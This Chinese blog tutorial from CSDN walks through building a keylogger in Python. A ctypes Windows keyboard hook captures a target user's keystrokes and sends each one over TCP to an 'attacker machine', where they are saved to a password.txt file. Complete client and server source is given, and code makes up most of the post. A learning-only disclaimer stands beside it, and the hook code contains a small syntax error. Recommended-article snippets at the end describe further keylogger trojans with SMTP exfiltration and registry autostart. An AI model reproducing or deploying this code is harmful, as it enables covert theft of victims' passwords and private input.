Python黑客攻防(二)键盘监听

最新推荐文章于 2023-03-17 12:52:04 发布
最新推荐文章于 2023-03-17 12:52:04 发布
阅读量1.7k 收藏 25
点赞数 1
分类专栏: Python黑客编程 文章标签: python Cisco 从入门到精通 网络安全 计算机类
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43681532/article/details/107137406
版权

注:首发于微信公众号:黑客帮。本教程仅供学习交流,未经允许禁止转载。请勿用于非法用途,后果自负。大神勿喷。

前言:本篇教程演示如何编写一个键盘监听器,在内网中获取目标用户输入并保存。个人能力有限只能捕获26个英文字符和26个英文键上方的0到9,捕获到的0到9对应字符分别是“PQRSTUVWXY”,测试见文末视频。

原理:使用ctypes模块进行键盘输入信息勾取,然后通过TCP通信将勾取到的信息传输到攻击机然后保存。

(ctypes官方文档:https://docs.python.org/3.7/library/ctypes.html)

教程:

(一)键盘输入信息勾取

导入DLL库为注册钩子准备

user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")

用处:

user32.dll:是Windows用户界面相关应用程序接口,用于包括Windows处理,基本用户界面等特性,如创建窗口和发送消息。

kernel32.dll:控制着系统的内存管理、数据的输入输出操作和中断处理。

注册HOOK

Hook技术:又叫做钩子函数,系统在调用函数之前,钩子程序就先捕获该消息,钩子函数先得到控制权,这时钩子函数既可以加工处理(改变)该函数的执行行为,还可以强制结束消息的传递。

通过官方文档可知钩子的类型:

HHOOK SetWindowsHookExA(
  int       idHook,
  HOOKPROC  lpfn,
  HINSTANCE hmod,
  DWORD     dwThreadId
);

python代码

def installHookProc(hooked, pointer):
    hooked = user32.SetWindowsHookExA(
        13,
        pointer,
        kernel32.GetModuleHandleW(),
        0
    )

第一个参数:
WH_KEYBOARD_LL的常量值为13代表的意思是监视低级键盘输入事件,我们此处来监听键盘事件。

第二个参数:
lpfn代表指向钩子过程的指针,要填入钩子过程(函数),我们可以在此处来添加额外代码达到我们想要达成的目的。

第三个参数:
hmod表示为DLL句柄,我们可以使用kernel32中的GetModuleHandleW()来获取句柄。

第四个参数:
dwThreadId我们填入0代表与同一桌面上所有的线程关联。

编写钩子

在Windows中需要用WINFUNCTYPE来创建函数,WINFUNCTYPE为Windows下独有的,通过使用使用stdcall调用约定的函数。

HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))

关于回调函数因为我们调用的是WH_KEYBOARD_LL,WH_KEYBOARD_LL会使用LowLevelKeyboardProc回调函数。我们也需要在Python中定义它。

LowLevelKeyboardProc数据结构如下

LRESULT CALLBACK LowLevelKeyboardProc(
  _In_ int    nCode,
  _In_ WPARAM wParam,
  _In_ LPARAM lParam
);

如果nCode小于零,则挂钩过程必须将消息传递给CallNextHookEx函数,而无需进一步处理,并且应返回CallNextHookEx返回的值。

python代码

class KBDLLHOOKSTRUCT(Structure):
    _fields_ = [
        ('vkCode', DWORD),
        ('scanCode', DWORD),
        ('flags', DWORD),
        ('time', DWORD),
        ('dwExtraInfo', DWORD)]
def hookProc(nCode, wParam, lParam):
    if nCode < 0:
        return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
    else:
        if wParam == 256:
            if 162 == lParam.contents.value:
                print("Ctrl pressed, call Hook uninstall()")
                uninstallHookProc(hooked)
                sys.exit(-1)
            capsLock = user32.GetKeyState(20)
            # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT))
            if lParam.contents.value == 13:
                print("\n")
            elif capsLock:
                print(chr(lParam.contents.value), end="")else:
                print(chr(lParam.contents.value + 32), end="")  # 输出勾取到的数据
​
                tcp_l(chr(lParam.contents.value + 32))  # tcp传输
​
    return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

删除HOOK
      主动删除HOOK,不然大量的HOOK会使系统运行缓慢。

user32.UnhookWindowsHookEx(hooked)

(二)TCP通信

服务端(攻击机)
将收到的数据保存

#写入文件
def write_file(word):
  f = open(r"C:\Users\ASUS\Desktop\password.txt","a+",encoding="utf-8")
  f.write(word)

接收数据

MaxBytes = 1024 * 1024 # 最大字节
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.settimeout(120)
#host = '192.168.1.18'
host = socket.gethostname() # 获取本机ip
port = 2828
server.bind((host, port))  # 绑定端口
​
server.listen(1)  # 监听
try:
    client, addr = server.accept()  # 等待客户端连接
    print(addr, " 连接成功!\n")
    while True:
        data = client.recv(MaxBytes)
        localTime = time.asctime(time.localtime(time.time()))
        print(localTime, ' 接收到数据字节数:', len(data))
        write_file(data.decode())  #调用文件写入函数
        print(data.decode())        
except BaseException as e:
    print("出现异常:%s"%e)    
finally:
    server.close()  # 关闭连接
    print("连接已断开!!")

客户端(靶机)

import socket
MaxBytes = 1024 * 1024
host = '192.168.1.18'  # 服务端的IP
port = 2828  # 端口
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(100)  # 设置超时时间
client.connect((host, port))
​
def tcp_l(word2):
    client.send(word2.encode())

(三)完整源码

1.受监听端

# -*- coding: gbk -*-
# 勾取
import sys
from ctypes import *
from ctypes.wintypes import DWORD, MSG
​
# 传输
import socket
​
MaxBytes = 1024 * 1024
host = '192.168.1.18'  # 服务端IP
port = 2828
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(60)  
client.connect((host, port))
​
def tcp_l(word2):
    client.send(word2.encode())#client.close()
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")
​
class KBDLLHOOKSTRUCT(Structure):
    _fields_ = [
        ('vkCode', DWORD),
        ('scanCode', DWORD),
        ('flags', DWORD),
        ('time', DWORD),
        ('dwExtraInfo', DWORD)]
​
​
def uninstallHookProc(hooked):
    if hooked is None:
        return
    user32.UnhookWindowsHookEx(hooked)
    hooked = None
​
​
def hookProc(nCode, wParam, lParam):
    if nCode < 0:
        return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
    else:
        if wParam == 256:
            if 162 == lParam.contents.value:
                print("Ctrl pressed, call Hook uninstall()")
                uninstallHookProc(hooked)
                sys.exit(-1)
            capsLock = user32.GetKeyState(20)
           
            if lParam.contents.value == 13:
                print("\n")
            elif capsLock:
                print(chr(lParam.contents.value), end="")else:
                print(chr(lParam.contents.value + 32), end="")  # 输出勾取到的数据
​
                tcp_l(chr(lParam.contents.value + 32))  # tcp传输
​
    return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
​
​
def startKeyLog():
    msg = MSG()
    user32.GetMessageA(byref(msg), 0, 0, 0)
​
​
def installHookProc(hooked, pointer):
    hooked = user32.SetWindowsHookExA(
        13,
        pointer,
        kernel32.GetModuleHandleW(),
        0
    )
    if not hooked:
        return False
    return True
​
​
HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
​
pointer = HOOKPROC(hookProc)
hooked = None
if installHookProc(hooked, pointer):
    print("Hook installed")
    try:
        msg = MSG()
        user32.GetMessageA(byref(msg), 0, 0, 0)
    except KeyboardInterrupt as kerror:
        uninstallHookProc(hooked)
        print("Hook uninstall...")
else:
    print("Hook installed error")

监听端

#coding: gbk 
import socket
import time
​
#写入文件
def write_file(word):
  f = open(r"C:\Users\ASUS\Desktop\password.txt","a+",encoding="utf-8")
  f.write(word)
​
MaxBytes = 1024 * 1024 # 最大字节
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.settimeout(60)
#host = '192.168.1.18'
host = socket.gethostname() # 获取本机ip
port = 2828
server.bind((host, port))  # 绑定端口
​
server.listen(1)  # 监听
try:
    client, addr = server.accept()  # 等待客户端连接
    print(addr, " 连接成功!\n")
    while True:
        data = client.recv(MaxBytes)
        localTime = time.asctime(time.localtime(time.time()))
        print(localTime, ' 接收到数据字节数:', len(data))
        write_file(data.decode())  # 调用写入函数
        print(data.decode())
        
except BaseException as e:
    print("出现异常:%s"%e)
    
finally:
    server.close()  # 关闭连接
    print("连接已断开!!")

(四)测试视频

物理机:受监听端
虚拟机:监听端
链接:https://pan.baidu.com/s/1NMf55PHaRd-jVsngq5oU0w
提取码:2hc6

肥胖喵
关注
专栏目录
[网络安全自学篇] 十五.Web安全学习路线及木马、病毒和防御初探
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8058
章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
python监控键盘输入实例代码
09-20
主要介绍了python监控键盘输入实例代码,分享了相关代码示例,小编觉得还是挺不错的,具有一定借鉴价值,需要的朋友可以参考下
python 键盘记录_Python告诉你木马程序的键盘记录原理
weixin_39756540的博客
12-09 250
前言Python keylogger键盘记录的功能的实现主要利用了pythoncom及pythonhook,然后就是对windows API的各种调用。Python之所以用起来方便快捷,主要归功于这些庞大的支持,正所谓"人生苦短,快用Python"。# -*- coding: utf-8 -*-from ctypes inportimport pythoncomimport pyHookimpo...
python实现鼠标键盘事件_Python利用pyHook实现监听用户鼠标与键盘事件
weixin_39906499的博客
12-04 199
# -*- coding: utf-8 -*- #import pythoncomimport pyHookimport timeimport socketfrom PIL import ImageGrab##如果是远程监听某个目标电脑,可以自己架设一个服务器,然后将获取到的信息发回给服务器#def send_msg_to_server(msg):host=""port=1234buf_size=...
python实现键盘记录木马_python键盘监听木马(SMTP信箱收取监听结果、修改注册表自启动)...
weixin_39980129的博客
12-09 1068
最近接触了python的win32子提供了不少可用于windows开发的API,这里就利用这个为原理制作一个键盘监听木马的雏形。这里需要使用额外的模块pythonHook(放置钩子时),pythoncom主要监听功能相关代码:#放置键盘监听钩子def seeing():PH=pyHook.HookManager()PH.KeyDown=KeyboardEventPH.HookKeyboard...
python监控客户端进程与键盘记录并上传至服务器
问道·六韬
11-01 1190
# -*- coding: utf-8 -*- from ctypes import * import pythoncom import pyHook import win32clipboard from inc import MyFtp from inc import ScreenShot import time import os user32 = windll.user32 kernel
20221902 2022-2023-2 《网络攻防实践》第三次作业
最新发布
xiannvyeye的博客
03-17 423
网络嗅探是一种黑客常用的窃听技术,利用计算机的网络接口截获目的地为其他计算机的数据报文,以监听数据流中所包含的用户账户密码或私密信息等。
案例教程—200行python实现杀手级连连看外挂程序
简书博客搬家测试账号
06-11 3083
欢迎关注天善智能,我们是专注于商业智能BI,人工智能AI,大数据分析与挖掘领域的垂直社区,学习,问答、求职一站式搞定! 对商业智能BI、大数据分析挖掘、机器学习,python,R等数据领域感兴趣的同学加微信:tsaiedu,并注明消息来源,邀请你进入数据爱好者交流群,数据爱好者们都在这儿。 作者:三级狗 长不帅的程序猿小哥哥 Python爱好者社区专...
网络安全攻防技术解密
## 第一章:网络安全概述 网络安全是指保护计算机网络及其使用的数据不受未经授权的访问、使用、插入、删除或者更改的威胁。在网络时代,网络安全的重要性不言而喻,因为网络攻击和威胁日益增多,网络的安全性更加...
Python监听键盘和鼠标事件的示例代码
01-19
我们可以利用windows提供的api函数来实现对系统键盘事件和鼠标事件的监听,主要利用的是SetWindowsHookEx函数,这个函数可以允许调用者传入一个钩子函数也叫回调函数,当指定的事件发生时,你 传入的函数就会被触发,有些事件是进程级的,有些事件是系统级的,这里我们用WH_KEYBOARD_LL来监听系统键盘事件,用WH_MOUSE_LL来监听鼠标事件,注意不是WH_KEYBOARD,使用WH_KEYBOARD是无法监听到外部 程序的事件的,这个可以在windows官方文档里面看到说明,要用WH_KEYBOARD来监听系统键盘必须写dll去实现。 因为用到了一些宏定义在win32co
Python告诉你木马程序的键盘记录原理
09-19
今天小编就为大家分享一篇关于Python告诉你木马程序的键盘记录原理,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
python3.0模拟实现的对讲机功能
10-09
本程序是在pycharm上完成编写的 运行该程序时首先运行服务端程序,其次将客户端代码运行起来 就可以模拟对讲机进行一个客户端与服务端之间的对话
Python利用pyHook实现监听用户鼠标与键盘事件
12-24
本文以一段简单的监听鼠标、键盘事件的程序,实现获取用户的输入(比如登录某些网站的账号、密码)的功能。经测试,对于一台“裸奔”的电脑,完全能获取到用户输入的任何信息;但是如果安装了杀毒软件,就够呛了。具体实现方法如下: 一、代码部分:获取用户输入信息,并与截图一起保存到XX目录下 # -*- coding: utf-8 -*- # import pythoncom import pyHook import time import socket from PIL import ImageGrab # #如果是远程监听某个目标电脑,可以自己架设一个服务器,然后将获取到的信息发回给服务器 # de
python输入文件名_python 获取键盘输入的文件名称
weixin_39692037的博客
11-28 611
importxlrdimportxlwtimportsysMARGE_INPUT_FILE_NAME_STR=inputMARGE_OUTPUT_FILE_NAME_STR=u"结果表.xls"MARGE_SHEET1_NAME_STR=u"sheet1"MARGE_SHEET_NAME_STR=u"核算项目明细表"d...import xlrdimport xlwtimport sysMARGE...
python实现键盘记录木马_想知道木马程序的键盘记录原理吗?python告诉你 !
weixin_39560002的博客
12-09 363
前言Python keylogger键盘记录的功能的实现主要利用了pythoncom及pythonhook,然后就是对windows API的各种调用。Python之所以用起来方便快捷,主要归功于这些庞大的支持,正所谓"人生苦短,快用Python"。# -*- coding: utf-8 -*-from ctypes inportimport pythoncomimport pyHookimpo...
python实现键盘记录木马_Python自制键盘记录木马!
weixin_39754398的博客
02-20 1197
声明我开发这个程序只有一个目的:学习。绝不会用于其他用途!我发布这个程序也只有一个目的:分享学习经验。鉴于其并没有任何反查杀功能,危害较小,故公开源码声明我开发这个程序只有一个目的:学习。绝不会用于其他用途!我发布这个程序也只有一个目的:分享学习经验。鉴于其并没有任何反查杀功能,危害较小,故公开源码,以供新手学习之用。Story Behind当时我为了刷一个QQ群(就是不停的往一个QQ群里发消息,...
python实现键盘记录木马_PYTHON简易木马(键盘记录)编译通过
weixin_39843847的博客
12-09 357
PTYHON 2.7PIP(简直是神器,就靠它了)pip记得加在系统变量里面pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whlpip install pywin32from ctypes import *import pyHookimport pythoncomimport win32clipboarduser32 = windll.user32ke...
黑客是如何“监听”手机的?如果有这3种信号,就说明你被盯上了【网络安全
jklbnm12的博客
07-28 3010
前言 众所周知,在互联网信息化时代,各种APP、游戏都需要进行“实名制”,所以人们的“个人信息”也变得十分的重要。而互联网又是一把双刃剑,虽然给人们带来了很多的便利、但同时也存在着很多的危险,很多人就利用自己高超的电脑技术,从而做一些“违法获利”的事情,甚至有一些人电脑高手也被大家称作为“黑客”。所以,如果一旦自己的手机出现以下3种“信号”,那么你就可能被监听了! 第一种“信号”:手机通讯录出现陌生号码、微信会有陌生“美女”添加 对于这一种信号,很多人是因为浏览“成人网站”、“不良网站”时,造成的个人信息
Python攻防秘籍:运用Python进阶黑客技术
"《Python绝技:运用Python成为顶级黑客》是一本面向安全从业者,特别是对渗透测试、Web分析、网络分析、取证分析和无线设备利用感兴趣的读者的专业书籍。本书由Chris Katsaropoulos撰写,并由草帽小子-DJ和crown丶...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值